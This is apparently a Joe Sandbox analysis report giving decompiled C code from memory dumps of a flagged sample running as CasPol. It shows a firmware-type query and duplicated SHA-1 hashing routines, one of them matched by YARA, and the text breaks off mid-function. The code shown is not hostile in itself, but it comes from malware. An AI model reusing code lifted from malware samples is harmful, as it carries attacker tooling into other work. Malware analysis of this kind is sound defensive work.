					_t115 = _t65 + _t65;
					E0166F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01643690(1, _t117, 0x1601810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0166AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01644620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0166AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E016A500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01669860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                0x016a51be
                                                                0x016a51c3
                                                                0x016a51c8
                                                                0x016a51cd
                                                                0x016a51d0
                                                                0x016a51d3
                                                                0x016a51d8
                                                                0x016a51db
                                                                0x016a51de
                                                                0x016a51e0
                                                                0x016a51e3
                                                                0x016a51e6
                                                                0x016a51e8
                                                                0x016a5342
                                                                0x016a5351
                                                                0x016a5356
                                                                0x016a535a
                                                                0x016a5360
                                                                0x016a5363
                                                                0x016a5366
                                                                0x016a5369
                                                                0x016a5369
                                                                0x016a536b
                                                                0x016a536b
                                                                0x016a5370
                                                                0x016a53a3
                                                                0x016a53a4
                                                                0x016a53a6
                                                                0x016a53ab
                                                                0x016a53ab
                                                                0x016a53ae
                                                                0x016a53ae
                                                                0x016a53b5
                                                                0x016a53bf
                                                                0x016a53bf
                                                                0x016a5375
                                                                0x016a5396
                                                                0x016a53a0
                                                                0x016a53a0
                                                                0x00000000
                                                                0x016a5396
                                                                0x016a5377
                                                                0x016a5379
                                                                0x016a537f
                                                                0x016a538c
                                                                0x016a5390
                                                                0x00000000
                                                                0x016a5390
                                                                0x016a51ee
                                                                0x016a51f1
                                                                0x016a5301
                                                                0x016a5310
                                                                0x016a5315
                                                                0x016a5318
                                                                0x016a531b
                                                                0x016a5320
                                                                0x016a532e
                                                                0x016a5331
                                                                0x00000000
                                                                0x016a5331
                                                                0x016a5328
                                                                0x016a5329
                                                                0x00000000
                                                                0x016a5329
                                                                0x016a51fa
                                                                0x016a5235
                                                                0x016a5236
                                                                0x016a5239
                                                                0x016a523f
                                                                0x016a5240
                                                                0x016a5241
                                                                0x016a5242
                                                                0x016a5246
                                                                0x016a5247
                                                                0x016a524e
                                                                0x016a5251
                                                                0x016a5267
                                                                0x016a5269
                                                                0x016a526e
                                                                0x016a527d
                                                                0x016a527e
                                                                0x016a5281
                                                                0x016a5282
                                                                0x016a5287
                                                                0x016a5288
                                                                0x016a528a
                                                                0x016a528f
                                                                0x016a5294
                                                                0x00000000
                                                                0x00000000
                                                                0x016a529a
                                                                0x016a529c
                                                                0x016a529e
                                                                0x016a529e
                                                                0x016a52a4
                                                                0x016a52b0
                                                                0x00000000
                                                                0x00000000
                                                                0x016a52ba
                                                                0x016a52bc
                                                                0x016a52bc
                                                                0x016a52d4
                                                                0x016a52d9
                                                                0x016a52dc
                                                                0x016a52e1
                                                                0x00000000
                                                                0x00000000
                                                                0x016a52e7
                                                                0x016a52f4
                                                                0x00000000
                                                                0x016a52f4
                                                                0x016a5270
                                                                0x00000000
                                                                0x016a5270
                                                                0x016a51fc
                                                                0x016a51fd
                                                                0x016a5202
                                                                0x016a5203
                                                                0x016a5205
                                                                0x016a520a
                                                                0x016a520f
                                                                0x00000000
                                                                0x00000000
                                                                0x016a521b
                                                                0x016a5226
                                                                0x016a522b
                                                                0x016a521d
                                                                0x016a521d
                                                                0x016a5222
                                                                0x016a5222
                                                                0x016a522d
                                                                0x00000000

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID: Legacy$UEFI
                                                                • API String ID: 2994545307-634100481
                                                                • Opcode ID: 39fc742b8cfa7d8ca342d030cd5787d090356ba5db6685da7b16ead7f8a85346
                                                                • Instruction ID: 35405bca14efc40fca0285ba933405ccaf63f407cfbe37c2476a9a178db48fb3
                                                                • Opcode Fuzzy Hash: 39fc742b8cfa7d8ca342d030cd5787d090356ba5db6685da7b16ead7f8a85346
                                                                • Instruction Fuzzy Hash: F0516D71A006099FDB25DFA8CC40AAEBBF9BF88700F54406DE60AEB251E7719D01CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040BF7E Relevance: 1.7, Strings: 1, Instructions: 424COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 72%
                                                                			E0040BF7E(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t319;
				signed int _t321;
				signed int _t324;
				signed int _t326;
				signed int _t335;
				signed int _t341;
				signed int _t342;
				signed int _t347;
				signed int _t356;
				signed int _t360;
				signed int _t361;
				signed int _t365;
				signed int _t368;
				signed int _t372;
				signed int _t373;
				signed int _t402;
				signed int _t407;
				signed int _t413;
				signed int _t416;
				signed int _t423;
				signed int _t426;
				signed int _t435;
				signed int _t437;
				signed int _t440;
				signed int _t448;
				signed int _t463;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t474;
				signed int _t482;
				signed int _t483;
				signed int* _t484;
				signed int* _t487;
				signed int _t494;
				signed int _t497;
				signed int _t502;
				signed int _t505;
				signed int _t508;
				signed int _t511;
				signed int _t512;
				signed int _t516;
				signed int _t528;
				signed int _t531;
				signed int _t538;
				void* _t544;
				void* _t546;

				asm("adc [esp-0x3e], ebx");
				_t544 = _t546;
				_t487 = _a4;
				_t356 = 0;
				_t2 =  &(_t487[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t544 + _t356 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t544 + _t356 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t544 + _t356 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t544 + _t356 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t356 = _t356 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t356 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t402 =  *(_t278 - 0x18);
					_t463 =  *(_t278 - 0x14);
					_t360 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t402;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t463;
					_t278[8] = _t360;
					_t319 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t319 ^ _t402;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t360 ^ _t463;
				} while ( *_t46 != 0);
				_t321 =  *_t487;
				_t279 = _t487[1];
				_t361 = _t487[2];
				_t407 = _t487[3];
				_v12 = _t321;
				_v16 = _t487[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t466 = _v8;
					_t494 = _t321 + ( !_t279 & _t407 | _t361 & _t279) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t324 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t407;
					_v12 = _t494;
					asm("rol esi, 0x5");
					_v8 = _t361;
					_t413 = _t494 + ( !_t324 & _t361 | _t279 & _t324) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t497 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t365 = _v12;
					_v8 = _t324;
					_t326 = _v8;
					_v12 = _t413;
					asm("rol edx, 0x5");
					_t285 = _t413 + ( !_t365 & _t497 | _t324 & _t365) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t416 = _v12;
					_v16 = _t497;
					asm("ror ecx, 0x2");
					_v8 = _t365;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t326;
					_t502 = _t285 + ( !_t416 & _t326 | _t365 & _t416) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t361 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t416;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t505 = _t502 + ( !_t361 & _t288 | _t416 & _t361) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t407 = _v8;
					asm("ror ecx, 0x2");
					_t467 = _t466 + 5;
					_t321 = _t505;
					_v12 = _t321;
					_v8 = _t467;
				} while (_t467 < 0x14);
				_t468 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t407;
					_t508 = _t505 + (_t407 ^ _t361 ^ _t279) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t335 = _v12;
					_v12 = _t508;
					asm("rol esi, 0x5");
					_t423 = _t508 + (_t361 ^ _t279 ^ _t335) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t511 = _t279;
					_v16 = _t361;
					_t368 = _v12;
					_v12 = _t423;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t423 + (_t279 ^ _t335 ^ _t368) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t426 = _v12;
					_v8 = _t335;
					_v8 = _t368;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t468 = _t468 + 5;
					_t361 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t511 + 0x6ed9eba1; // 0x6ed9eb9f
					_t512 = _t292 + (_t335 ^ _v8 ^ _t426) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t426;
					_v12 = _t512;
					asm("rol esi, 0x5");
					_t407 = _v8;
					_t505 = _t512 + (_t295 ^ _v8 ^ _t361) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x150)) + _t335 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t505;
				} while (_t468 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t407;
					asm("ror eax, 0x2");
					_t516 = ((_t361 | _t279) & _t407 | _t361 & _t279) +  *((intOrPtr*)(_t544 + _v8 * 4 - 0x14c)) + _t505 + _v16 - 0x70e44324;
					_t474 = _v12;
					_v12 = _t516;
					asm("rol esi, 0x5");
					_t341 = _v8;
					asm("ror edi, 0x2");
					_t435 = ((_t279 | _t474) & _t361 | _t279 & _t474) +  *((intOrPtr*)(_t544 + _t341 * 4 - 0x148)) + _t516 + _v16 - 0x70e44324;
					_v16 = _t361;
					_t372 = _v12;
					_v12 = _t435;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t437 = ((_t474 | _t372) & _t279 | _t474 & _t372) +  *((intOrPtr*)(_t544 + _t341 * 4 - 0x144)) + _t435 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t474;
					_v12 = _t437;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t528 = ((_t372 | _t299) & _t474 | _t372 & _t299) +  *((intOrPtr*)(_t544 + _t341 * 4 - 0x140)) + _t437 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t440 = _t372;
					_t361 = _v12;
					_v8 = _t440;
					_v12 = _t528;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t505 = ((_t299 | _t361) & _t440 | _t299 & _t361) +  *((intOrPtr*)(_t544 + _t341 * 4 - 0x13c)) + _t528 + _v16 - 0x70e44324;
					_t407 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t505;
					_t342 = _t341 + 5;
					_v8 = _t342;
				} while (_t342 < 0x3c);
				_t482 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t483 = _v8;
					asm("ror eax, 0x2");
					_t531 = (_t407 ^ _t361 ^ _t279) +  *((intOrPtr*)(_t544 + _t482 * 4 - 0x14c)) + _t505 + _v16 - 0x359d3e2a;
					_t347 = _v12;
					_v16 = _t407;
					_v12 = _t531;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t448 = (_t361 ^ _t279 ^ _t347) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x148)) + _t531 + _v16 - 0x359d3e2a;
					_v16 = _t361;
					_t373 = _v12;
					_v12 = _t448;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t347 ^ _t373) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x144)) + _t448 + _v16 - 0x359d3e2a;
					_t407 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t347;
					_t538 = (_t347 ^ _t373 ^ _t407) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t373;
					_v8 = _t347;
					asm("ror edx, 0x2");
					_v8 = _t373;
					_t361 = _v12;
					_v12 = _t538;
					asm("rol esi, 0x5");
					_t482 = _t483 + 5;
					_t505 = (_t305 ^ _t407 ^ _t361) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x13c)) + _t538 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t407;
					_v12 = _t505;
					_v8 = _t482;
				} while (_t482 < 0x50);
				_t484 = _a4;
				_t484[2] = _t484[2] + _t361;
				_t484[3] = _t484[3] + _t407;
				_t311 = _t484[4] + _v16;
				 *_t484 =  *_t484 + _t505;
				_t484[1] = _t484[1] + _t279;
				_t484[4] = _t311;
				_t484[0x17] = 0;
				return _t311;
			}

































































                                                                0x0040bf7e
                                                                0x0040bf84
                                                                0x0040bf8e
                                                                0x0040bf92
                                                                0x0040bf94
                                                                0x0040bf94
                                                                0x0040bf97
                                                                0x0040bfb9
                                                                0x0040bfdf
                                                                0x0040c005
                                                                0x0040c027
                                                                0x0040c02e
                                                                0x0040c031
                                                                0x0040c034
                                                                0x0040c03d
                                                                0x0040c043
                                                                0x0040c04a
                                                                0x0040c05b
                                                                0x0040c05e
                                                                0x0040c061
                                                                0x0040c065
                                                                0x0040c067
                                                                0x0040c069
                                                                0x0040c072
                                                                0x0040c075
                                                                0x0040c078
                                                                0x0040c083
                                                                0x0040c089
                                                                0x0040c08b
                                                                0x0040c08b
                                                                0x0040c08e
                                                                0x0040c091
                                                                0x0040c091
                                                                0x0040c096
                                                                0x0040c098
                                                                0x0040c09b
                                                                0x0040c09e
                                                                0x0040c0a4
                                                                0x0040c0a7
                                                                0x0040c0aa
                                                                0x0040c0b3
                                                                0x0040c0b9
                                                                0x0040c0c2
                                                                0x0040c0d1
                                                                0x0040c0d8
                                                                0x0040c0db
                                                                0x0040c0de
                                                                0x0040c0e7
                                                                0x0040c0ea
                                                                0x0040c0ed
                                                                0x0040c105
                                                                0x0040c10c
                                                                0x0040c10e
                                                                0x0040c111
                                                                0x0040c114
                                                                0x0040c11d
                                                                0x0040c124
                                                                0x0040c127
                                                                0x0040c12a
                                                                0x0040c139
                                                                0x0040c140
                                                                0x0040c143
                                                                0x0040c146
                                                                0x0040c14f
                                                                0x0040c159
                                                                0x0040c15c
                                                                0x0040c168
                                                                0x0040c16b
                                                                0x0040c172
                                                                0x0040c175
                                                                0x0040c178
                                                                0x0040c17d
                                                                0x0040c180
                                                                0x0040c189
                                                                0x0040c19a
                                                                0x0040c19d
                                                                0x0040c1a0
                                                                0x0040c1a7
                                                                0x0040c1aa
                                                                0x0040c1ad
                                                                0x0040c1b0
                                                                0x0040c1b2
                                                                0x0040c1b5
                                                                0x0040c1b8
                                                                0x0040c1c1
                                                                0x0040c1c6
                                                                0x0040c1c6
                                                                0x0040c1db
                                                                0x0040c1de
                                                                0x0040c1e1
                                                                0x0040c1e8
                                                                0x0040c1eb
                                                                0x0040c1ee
                                                                0x0040c203
                                                                0x0040c20a
                                                                0x0040c20d
                                                                0x0040c211
                                                                0x0040c214
                                                                0x0040c219
                                                                0x0040c21c
                                                                0x0040c22b
                                                                0x0040c22e
                                                                0x0040c235
                                                                0x0040c238
                                                                0x0040c23b
                                                                0x0040c23e
                                                                0x0040c241
                                                                0x0040c249
                                                                0x0040c257
                                                                0x0040c25a
                                                                0x0040c25d
                                                                0x0040c25d
                                                                0x0040c264
                                                                0x0040c267
                                                                0x0040c26a
                                                                0x0040c272
                                                                0x0040c280
                                                                0x0040c283
                                                                0x0040c28a
                                                                0x0040c28d
                                                                0x0040c290
                                                                0x0040c293
                                                                0x0040c296
                                                                0x0040c29f
                                                                0x0040c2a6
                                                                0x0040c2a6
                                                                0x0040c2ac
                                                                0x0040c2c5
                                                                0x0040c2c8
                                                                0x0040c2cf
                                                                0x0040c2d2
                                                                0x0040c2d5
                                                                0x0040c2e7
                                                                0x0040c2f1
                                                                0x0040c2f4
                                                                0x0040c2fd
                                                                0x0040c300
                                                                0x0040c307
                                                                0x0040c30a
                                                                0x0040c310
                                                                0x0040c323
                                                                0x0040c32a
                                                                0x0040c32d
                                                                0x0040c330
                                                                0x0040c333
                                                                0x0040c33c
                                                                0x0040c33f
                                                                0x0040c352
                                                                0x0040c355
                                                                0x0040c35f
                                                                0x0040c362
                                                                0x0040c364
                                                                0x0040c36d
                                                                0x0040c370
                                                                0x0040c383
                                                                0x0040c389
                                                                0x0040c38c
                                                                0x0040c393
                                                                0x0040c395
                                                                0x0040c398
                                                                0x0040c39b
                                                                0x0040c39e
                                                                0x0040c3a1
                                                                0x0040c3a4
                                                                0x0040c3ad
                                                                0x0040c3b2
                                                                0x0040c3b5
                                                                0x0040c3b5
                                                                0x0040c3c8
                                                                0x0040c3cb
                                                                0x0040c3ce
                                                                0x0040c3d5
                                                                0x0040c3d8
                                                                0x0040c3db
                                                                0x0040c3de
                                                                0x0040c3f1
                                                                0x0040c3f4
                                                                0x0040c3ff
                                                                0x0040c402
                                                                0x0040c40e
                                                                0x0040c411
                                                                0x0040c417
                                                                0x0040c41a
                                                                0x0040c41d
                                                                0x0040c424
                                                                0x0040c434
                                                                0x0040c437
                                                                0x0040c43d
                                                                0x0040c440
                                                                0x0040c447
                                                                0x0040c449
                                                                0x0040c44c
                                                                0x0040c44f
                                                                0x0040c452
                                                                0x0040c455
                                                                0x0040c45c
                                                                0x0040c46b
                                                                0x0040c46e
                                                                0x0040c475
                                                                0x0040c478
                                                                0x0040c47b
                                                                0x0040c47e
                                                                0x0040c481
                                                                0x0040c484
                                                                0x0040c487
                                                                0x0040c490
                                                                0x0040c4a1
                                                                0x0040c4a9
                                                                0x0040c4af
                                                                0x0040c4b2
                                                                0x0040c4b4
                                                                0x0040c4b7
                                                                0x0040c4ba
                                                                0x0040c4c7

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (
                                                                • API String ID: 0-3887548279
                                                                • Opcode ID: e58ba757d2cea3cf0aa36510cdc91d77d09d7bc5db60155aab268f2ad3b00527
                                                                • Instruction ID: 1c13cc515e38273434cd3dc2378e7bf44f33fd2e07e7fb5df5fb5c578cb68f3f
                                                                • Opcode Fuzzy Hash: e58ba757d2cea3cf0aa36510cdc91d77d09d7bc5db60155aab268f2ad3b00527
                                                                • Instruction Fuzzy Hash: A9021CB6E006199FDB14CF9AC8805DDFBF2FF88314F1AC1AAD849A7355D6746A418F80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040BF83 Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 73%
                                                                			E0040BF83(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
